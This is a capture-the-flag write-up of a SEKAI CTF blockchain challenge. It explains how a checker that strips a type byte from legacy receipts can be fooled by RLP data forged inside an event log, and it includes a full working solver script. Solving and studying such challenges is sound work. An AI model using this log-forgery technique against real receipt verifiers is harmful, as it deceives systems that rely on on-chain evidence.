Writeup

During SEKAI CTF, I encountered a very small blockchain challenge. I thought it would be a quick in-and-out experience, but it turned out to be a whole journey.

The source was small enough to give you false hope. We were given a contract that did nothing.

// SPDX-License-Identifier: MIT
// Fixed version to avoid foundry/4668
pragma solidity 0.8.27;

contract Cat {
    event Purr();
    function gibheadpats() public {
        revert("*sniff sniff HISS HISS* hooman detected....");
        emit Purr();
    }
}

We had to somehow produce a block whose logs said, in effect, that the contract above had executed emit Purr(). This is the server-side checker:

#!/usr/bin/env python3
from Crypto.Hash import keccak
from pyrlp import decode  # https://github.com/SamuelHaidu/simple-rlp
from web3 import Web3
from ctf_launchers import PwnChallengeLauncher, current_challenge
from ctf_launchers.types import ChallengeContract
from ctf_server.types import LaunchAnvilInstanceArgs

k = keccak.new(digest_bits=256)
k.update(b'Purr()')
TARGET = k.digest()

class Launcher(PwnChallengeLauncher):
    def get_anvil_instances(self) -> dict[str, LaunchAnvilInstanceArgs]:
        # This challenge uses a "custom" foundry build:
        #   https://github.com/es3n1n/foundry/commit/21da3334659c2e54ea0680192daa0883935a473d
        return {
            'main': self.get_anvil_instance(
                image='ghcr.io/es3n1n/foundry:latest',
                extra_allowed_methods=['debug_getRawReceipts'],
            ),
        }
    def is_solved(
        self,
        web3: Web3,
        contracts: list[ChallengeContract],
        dynamic_fields: dict[str, str],
        team: str,
    ) -> bool:
        block_num = dynamic_fields.get('block', 'latest')
        if not block_num.startswith('0x'):
            block_num = f'0x{block_num}'
        receipts = web3.provider.make_request(
            'debug_getRawReceipts',  # type: ignore[arg-type]
            [block_num],
        )
        if 'error' in receipts:
            return False
        recs = receipts['result']
        if not recs:
            return False
        try:
            rec = bytes.fromhex(recs[0].replace('0x', ''))
            _tx_type, rlp = rec[:1], rec[1:]
            receipt = decode(rlp)
            if receipt[0] != b'\x01':
                return False
            if len(receipt[2]) != 256:
                return False
            logs = [x for x in receipt[3] if int.from_bytes(x[0], 'big') == int(contracts[0]['address'], 16)]
            if not logs:
                return False
            log = logs[0]
            if log[2] != b'':
                return False
            if log[1] != [TARGET]:
                return False
        except Exception:
            return False
        return True
current_challenge.bind(Launcher(project_location='/challenge/project', dynamic_fields=['block']))
if __name__ == '__main__':
    current_challenge.run()

On top of this, the Python server source tells us that a custom Foundry build (basically the software running the chain) is in use. A quick look at it shows that it only adds an option to easily retrieve the logs, and that nothing can be exploited through this feature.

So what can we do?

After searching for much longer than I want to admit for a way to make the contract above emit that log, I came to the conclusion that it is impossible.

With this in mind, I checked the libraries, and the pyrlp one looked pretty old at first glance (last commit 2 years ago), so I dug deeper.

Essentially, it parses RLP-encoded blockchain data (here, the raw receipts with their logs) into actual Python objects, such as lists and byte strings. Considering what it does, a thought comes to mind.

What if I can inject logs that say the contract called purr without it doing so?

As of the writing of this post, there are six receipt types (one per transaction type) that our logs can end up in:

  • Legacy
  • EIP1559
  • EIP2930
  • EIP4844
  • EIP7702
  • Deposit

Looking at the raw encoding of each, all of them start with a one-byte type prefix, followed by 0xf9 and then the rest of the data. All of them except Legacy, that is, which has no prefix byte and starts directly with 0xf9.

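A quick check of the GitHub source reveals that the log reader doesn’t account for this case, and the checker above always strips the first byte as if it were a type prefix (_tx_type, rlp = rec[:1], rec[1:]). This means we may be able to manipulate the data.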
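To make the difference concrete, here is a minimal sketch of what an unconditional "drop the first byte" does to a typed versus a legacy receipt. The tiny encoder is hand-written for illustration (it is not the library the challenge uses), the receipt values are made up, and `strip_type_byte` is a hypothetical name for the split the checker performs.

```python
def _header(length, offset):
    # Short form: one byte. Long form: prefix byte + big-endian length bytes.
    if length <= 55:
        return bytes([offset + length])
    len_bytes = length.to_bytes((length.bit_length() + 7) // 8, "big")
    return bytes([offset + 55 + len(len_bytes)]) + len_bytes


def rlp_encode(item):
    """Minimal canonical RLP encoder for bytes and (nested) lists."""
    if isinstance(item, bytes):
        if len(item) == 1 and item[0] < 0x80:
            return item
        return _header(len(item), 0x80) + item
    payload = b"".join(rlp_encode(x) for x in item)
    return _header(len(payload), 0xC0) + payload


# Toy receipt: [status, cumulative_gas, bloom, logs]; values are illustrative.
receipt = [b"\x01", b"\x52\x08", b"\x00" * 256, []]
body = rlp_encode(receipt)

typed = b"\x02" + body   # typed receipt: type byte, then the RLP list
legacy = body            # legacy receipt: the RLP list only


def strip_type_byte(rec):
    # Same unconditional split as the checker: rec[:1] is assumed to be the type
    return rec[1:]


print(strip_type_byte(typed)[:3].hex())   # f90108 -> still a list header
print(strip_type_byte(legacy)[:3].hex())  # 010801 -> list header gone, length bytes exposed
```

For the legacy receipt, the decoder no longer sees a list header. It starts reading at the two length bytes, which it will interpret as RLP items of their own.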

Right after the 0xf9 byte comes the length of the encoded data, which we can manipulate. This means that by careful injection, we can satisfy these conditions:

if receipt[0] != b'\x01':
    return False
if len(receipt[2]) != 256:
    return False
logs = [x for x in receipt[3] if int.from_bytes(x[0], 'big') == int(contracts[0]['address'], 16)]
if not logs:
    return False
log = logs[0]
if log[2] != b'':
    return False
if log[1] != [TARGET]:
    return False
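As a reference for what the forgery has to decode to, the sketch below restates those conditions as a function over an already-decoded receipt and builds one structure that passes. `passes_checks`, the address and the topic bytes are placeholders for illustration; the real topic is the keccak-256 hash of "Purr()".

```python
def passes_checks(receipt, cat_address_hex, target):
    """Re-statement of the checker's conditions on a decoded receipt."""
    if receipt[0] != b"\x01":          # status must decode to the single byte 0x01
        return False
    if len(receipt[2]) != 256:         # bloom-sized field
        return False
    logs = [x for x in receipt[3]
            if int.from_bytes(x[0], "big") == int(cat_address_hex, 16)]
    if not logs:
        return False
    log = logs[0]
    # Empty data and exactly one topic
    return log[2] == b"" and log[1] == [target]


CAT_ADDRESS = "0x" + "11" * 20   # placeholder address
TARGET = b"\xaa" * 32            # placeholder standing in for keccak256("Purr()")

wanted = [
    b"\x01",                     # receipt[0]
    b"",                         # receipt[1] is never inspected by the checker
    b"\x00" * 256,               # receipt[2]
    [[bytes.fromhex(CAT_ADDRESS[2:]), [TARGET], b""]],  # receipt[3]: one log
]

print(passes_checks(wanted, CAT_ADDRESS, TARGET))
```

Two details stand out: index 1 is not checked at all, and the address is compared as an integer, so only its numeric value matters.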

We can use those controlled-length bytes to forge a fake long string that skips all the data that we don’t control and jumps into our controlled data. From there, it was easy enough to forge the required logs.
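The "long string that skips data" idea relies on how RLP headers declare lengths. Below is a small sketch of a header reader following the RLP prefix rules. `read_header` is a hypothetical helper written for this post, not part of any library, and the junk bytes are made up.

```python
def read_header(buf, pos=0):
    """Return (kind, payload_start, payload_len) for the RLP item at pos."""
    b = buf[pos]
    if b < 0x80:                      # single byte, is its own payload
        return "bytes", pos, 1
    if b <= 0xB7:                     # short string, length in the prefix
        return "bytes", pos + 1, b - 0x80
    if b <= 0xBF:                     # long string, next n bytes hold the length
        n = b - 0xB7
        return "bytes", pos + 1 + n, int.from_bytes(buf[pos + 1:pos + 1 + n], "big")
    if b <= 0xF7:                     # short list
        return "list", pos + 1, b - 0xC0
    n = b - 0xF7                      # long list, next n bytes hold the length
    return "list", pos + 1 + n, int.from_bytes(buf[pos + 1:pos + 1 + n], "big")


# Headers that appear in the solver
print(read_header(b"\xb9\x01\x00"))      # ('bytes', 3, 256)
print(read_header(b"\xf9\x07\x00"))      # ('list', 3, 1792)
print(read_header(b"\xfa\x01\xb9\xbd"))  # ('list', 4, 113085)

# A declared string length swallows whatever follows, controlled or not:
buf = b"\xb9\x00\x05" + b"JUNK!" + b"\x01"
kind, start, length = read_header(buf)
next_item = start + length
print(kind, buf[start:next_item], buf[next_item:])  # bytes b'JUNK!' b'\x01'
```

Whoever controls the length bytes decides where the decoder resumes parsing, which is what lets the forged fields line up with the checker's indices.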

Here is the full solver for the challenge for anyone interested. I left some comments where the forgery takes place for better understanding.

#!/usr/bin/env python3
from env import RPC, PRIV, CAT
from web3 import Web3
from eth_account import Account
from Crypto.Hash import keccak
from eth_account.signers.local import LocalAccount
from hexbytes import HexBytes
from solcx import compile_standard, install_solc

SRC = r"""// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;

contract Purrer {
    event Purr();
    bytes32 constant TOPIC = keccak256("Purr()");

    function emitPurr() external { emit Purr(); }

    function emitPurrWithBytes(bytes calldata payload) external {
        bytes32 t = TOPIC;
        // Copy calldata -> memory, then log from memory (logs read memory only)
        assembly {
            let len := payload.length
            let ptr := mload(0x40)
            let newfree := and(add(add(ptr, len), 31), not(31))
            mstore(0x40, newfree)
            calldatacopy(ptr, payload.offset, len)
            log1(ptr, len, t)
        }
    }
}
"""

def ensure_solc(v="0.8.24"):
    # Best effort: ignore failures (e.g. the compiler is already installed)
    try:
        install_solc(v)
    except Exception:
        pass

def compile_src():
    ensure_solc()
    out = compile_standard(
        {
            "language": "Solidity",
            "sources": {"Purrer.sol": {"content": SRC}},
            "settings": {
                "optimizer": {"enabled": True, "runs": 200},
                "outputSelection": {"*": {"*": ["abi","evm.bytecode.object"]}},
            },
        },
        solc_version="0.8.24",
    )
    c = out["contracts"]["Purrer.sol"]["Purrer"]
    return c["abi"], c["evm"]["bytecode"]["object"]

def raw_tx_bytes(signed) -> bytes:
    return getattr(signed, "rawTransaction", None) or getattr(signed, "raw_transaction", None)

def send_and_wait_legacy(w3: Web3, acct: LocalAccount, tx, *, nonce=None):
    tx = dict(tx)
    if nonce is None:
        nonce = w3.eth.get_transaction_count(acct.address)
    tx.setdefault("nonce", nonce)
    tx.setdefault("gasPrice", w3.to_wei(2, "gwei"))  # legacy fee field
    tx.setdefault("chainId", w3.eth.chain_id)
    signed = acct.sign_transaction(tx)
    raw = raw_tx_bytes(signed)
    if not raw:
        raise RuntimeError("Couldn't extract raw tx bytes from SignedTransaction")
    txh = w3.eth.send_raw_transaction(raw)
    rcpt = w3.eth.wait_for_transaction_receipt(txh)
    return txh.hex(), rcpt

def print_receipt_logs(rcpt):
    print(f"status={rcpt.status} block={rcpt.blockNumber} gasUsed={rcpt.gasUsed}")
    for i, lg in enumerate(rcpt.logs):
        addr = lg["address"]
        topics = [(t.hex() if isinstance(t, (bytes, bytearray, HexBytes)) else t) for t in lg["topics"]]
        data_hex = lg["data"] if isinstance(lg["data"], str) else lg["data"].hex()
        if data_hex.startswith("0x"):
            data_len = len(bytes.fromhex(data_hex[2:]))
        else:
            data_len = len(bytes.fromhex(data_hex))
        print(f"  log[{i}].address={addr}")
        print(f"  log[{i}].topics[0]={topics[0] if topics else None}")
        print(f"  log[{i}].data_len={data_len}")

def main():
    MODE = "bytes"

    w3 = Web3(Web3.HTTPProvider(RPC, request_kwargs={"timeout": 300}))
    if not w3.is_connected():
        raise SystemExit("Cannot connect to RPC")

    acct = Account.from_key(PRIV)
    print("Sender:", acct.address)
    print("Chain :", w3.eth.chain_id)

    abi, bytecode = compile_src()


    nonce0 = w3.eth.get_transaction_count(acct.address)
    txh0, rcpt0 = send_and_wait_legacy(
        w3, acct,
        {
            "from": acct.address,
            "data": "0x" + bytecode,
            "gas": 3_000_000,
            "value": 0,
        },
        nonce=nonce0,
    )
    purrer = rcpt0.contractAddress
    print("Deployed at:", purrer)
    print("tx:", txh0)

    contract = w3.eth.contract(address=purrer, abi=abi)


    if MODE == "bytes":
        addr_bytes = bytes.fromhex(str(CAT)[2:])
        k = keccak.new(digest_bits=256)
        k.update(b'Purr()')
        TARGET = k.digest()
        # Build the exact log data here.
        # Zero padding in front of the forged fields.
        raw = b'\x00' * 665
        raw += b'\x00' * 286
        # 256-byte string (the size the checker expects for receipt[2]):
        # header 0xb9 + 2-byte length 0x0100, then 256 zero bytes.
        raw += b'\xb9\x01\x00'
        raw += b'\x00' * 256
        # Forged logs list: header 0xf8, its 1-byte length is appended further down.
        raw += b'\xf8'

        # One forged log entry: [address, [topic], data]
        in_arr_payload = b''
        in_arr_payload += b'\xf8'

        # address: 0xb8 + 1-byte length + the Cat contract address
        in_arr_payload21 = b''
        in_arr_payload21 += b'\xb8'
        in_arr_payload21 += bytes([len(addr_bytes)])
        in_arr_payload21 += addr_bytes

        # topics list: 0xf8 + 1-byte length + a single topic
        in_arr_payload22 = b''
        in_arr_payload22 += b'\xf8'

        # topic: 0xb8 + 1-byte length + keccak256("Purr()")
        in_arr_payload32 = b''
        in_arr_payload32 += b'\xb8'
        in_arr_payload32 += bytes([len(TARGET)])
        in_arr_payload32 += TARGET

        in_arr_payload22 += bytes([len(in_arr_payload32)])
        in_arr_payload22 += in_arr_payload32

        # data: 0x80 is the empty string
        in_arr_payload23 = b'\x80'

        in_arr_payload22 += in_arr_payload23
        in_arr_payload21 += in_arr_payload22

        # Close the log entry, then the logs list
        in_arr_payload += bytes([len(in_arr_payload21)])
        in_arr_payload += in_arr_payload21

        raw += bytes([len(in_arr_payload)])
        raw += in_arr_payload
        
        ELEM = b'\x86' + b'\x13'*6     # 7 bytes: header for a 6-byte string + payload
        PER_CHUNK = 256
        CHUNK_PAYLOAD = ELEM * PER_CHUNK     # 256 * 7 = 1792 = 0x0700
        CHUNK = b'\xf9\x07\x00' + CHUNK_PAYLOAD  # list (len-of-len=2) len=0x0700

        NUM_CHUNKS = (16128 // PER_CHUNK) - 1      # 63 - 1 = 62
        top_payload = CHUNK * NUM_CHUNKS     # each chunk is an RLP *element* of the top list
        top_len = NUM_CHUNKS * (1792 + 3)    # actual payload length = 62 * 1795 = 111290 = 0x01B2BA (unused below)

        # Top list header (len-of-len=3) is hard-coded to len=0x01B9BD
        # (113085 = 63 * 1795), one chunk more than top_payload actually holds.
        raw += b'\xfa\x01\xb9\xbd' + top_payload
        raw += b'\x00\x00\x00'
        print(len(raw))

        print(raw)

        built = contract.functions.emitPurrWithBytes(raw).build_transaction({
            "from": acct.address,
            "value": 0,
            "nonce": nonce0 + 1,
            "chainId": w3.eth.chain_id,
        })


    # Force legacy: strip 1559 fields just in case
    built.pop("maxFeePerGas", None)
    built.pop("maxPriorityFeePerGas", None)

    # Gas: ~ 375 + 375 (1 topic) + 8*LEN + mem copy/expansion.
    try:
        g_est = w3.eth.estimate_gas({**built, "gasPrice": w3.to_wei(2, "gwei")})
        built["gas"] = int(g_est * 12 // 10)  # +20%
    except Exception:
        # Fallback upper bound if the estimate balks. len(built["data"]) is the
        # ABI-encoded calldata size, not the log size, so be generous.
        data_len = len(built["data"])
        built["gas"] = 1_000_000 + 12 * max(data_len, 100_000)

    txh1, rcpt1 = send_and_wait_legacy(w3, acct, built, nonce=nonce0 + 1)
    print("tx:", txh1)
    print_receipt_logs(rcpt1)
    print("\nPurr() topic:", Web3.keccak(text="Purr()").hex())

if __name__ == "__main__":
    main()
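The nested `in_arr_payload*` variables in the solver are easier to follow when written as a helper. The sketch below rebuilds the same forged logs list with a hypothetical `long_item` helper and reads it back with a small, lenient, hand-written decoder (an illustration, not the library the challenge uses). The address and topic are placeholders.

```python
def long_item(prefix, payload):
    """Header byte (0xb8 for strings, 0xf8 for lists) + 1-byte length + payload."""
    assert len(payload) < 256
    return bytes([prefix, len(payload)]) + payload


def decode_item(buf, pos=0):
    """Lenient RLP decode of one item; returns (value, next_pos).

    No canonical-form checks, so 0xb8/0xf8 headers are accepted for short payloads.
    """
    b = buf[pos]
    if b < 0x80:
        return buf[pos:pos + 1], pos + 1
    if b < 0xC0:                                   # byte string
        if b <= 0xB7:
            start, length = pos + 1, b - 0x80
        else:
            n = b - 0xB7
            start = pos + 1 + n
            length = int.from_bytes(buf[pos + 1:start], "big")
        return buf[start:start + length], start + length
    if b <= 0xF7:                                  # list
        start, length = pos + 1, b - 0xC0
    else:
        n = b - 0xF7
        start = pos + 1 + n
        length = int.from_bytes(buf[pos + 1:start], "big")
    items, cur, end = [], start, start + length
    while cur < end:
        value, cur = decode_item(buf, cur)
        items.append(value)
    return items, end


addr = b"\x11" * 20    # placeholder for the Cat contract address
topic = b"\xaa" * 32   # placeholder standing in for keccak256("Purr()")

# log = [address, [topic], b""]; logs = [log]
log = long_item(0xF8, long_item(0xB8, addr)
                + long_item(0xF8, long_item(0xB8, topic))
                + b"\x80")
logs = long_item(0xF8, log)

decoded, _ = decode_item(logs)
print(decoded == [[addr, [topic], b""]])
```

Several of these headers use the long form for payloads that would fit the short form, so this layout only works against a decoder that does not enforce canonical encoding.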